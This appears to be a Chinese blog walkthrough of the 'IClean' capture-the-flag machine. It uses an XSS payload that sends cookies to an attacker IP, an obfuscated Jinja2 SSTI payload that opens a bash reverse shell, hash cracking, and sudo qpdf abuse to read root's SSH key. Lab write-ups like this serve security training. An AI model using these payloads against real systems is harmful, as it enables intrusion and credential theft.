freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

[Meachines][Medium]IClean
2024-04-24 20:04:35

Main

$ nmap -p- -sC -sV 10.10.11.12 -Pn --min-rate 1000

image.png

$ echo "10.10.11.12 capiclean.htb">>/etc/hosts

image.png

这题可能和python的SSTI有关

image.png

$ gobuster dir --url "http://capiclean.htb" --wordlist /usr/share/seclists/Discovery/Web-Content/common.txt

image.png

http://capiclean.htb/quote
存在一处服务订购提交页面,不是一个查询服务所以sql注入的可能性就小很多

image.png

image.png

<img src='http://10.10.16.23/' onerror='fetch("http://10.10.16.23?c="+document.cookie)' />

image.png

image.png

这里如果没有cookie就新建一个

把path改成/
image.png

访问dashboard

image.png

在InvoiceGenerator用于生成订单

image.png

将生成的订单id来到QRGenerator生成二维码扫描

image.png

这是一份账单

image.png

在qr_link参数中,{{4*4}}在响应包中返回16证明存在SSTI

image.png

{{request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fimport\x5f\x5f")("os")|attr("popen")("bash -c 'bash -i >& /dev/tcp/10.10.16.23/10032 0>&1'")|attr("read")()}}

image.png

在app.py中发现泄露了数据库配置信息

image.png

db_config = { 'host': '127.0.0.1', 'user': 'iclean', 'password': 'pxCsmnGLckUb', 'database': 'capiclean' }

$ mysql -u iclean -p

image.png

mysql> use capiclean;
mysql> select * from users;
image.png

将consuela的哈希进行破解

$ echo "0a298fdd4d546844ae940357b631e40bf2a7847932f82c494daa1c9c5d6927aa">hash

$ hashcat -m 1400 -a 0 hash /usr/share/wordlists/rockyou.txt

image.png

simple and clean

User Flag

$ su consuela
$ cat /home/consuela/user.txt

image.png

e4fb54144493b2df71de87281902e002

Root Flag

$ sudo -l

image.png

  • /usr/bin/qpdf 是一个用于处理PDF文件的命令行工具。它可以执行各种PDF文件操作,包括合并、拆分、解密、加密、旋转页面等。QPDF提供了丰富的功能和选项,可以让用户在命令行下方便地进行PDF文件的处理。

$ sudo /usr/bin/qpdf --empty /tmp/key.pdf --qdf --add-attachment /root/.ssh/id_rsa --
$ cat /tmp/key.pdf

image.png

通过私钥登录Root用户

$ chmod 400 id_rsa ;ssh -i id_rsa root@10.10.11.12

root@iclean:~# cat /root/root.txt

image.png

e9f42fab26856026679cbcd1bb76b7ed

# 渗透测试 # 黑客 # web安全 # 数据安全
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者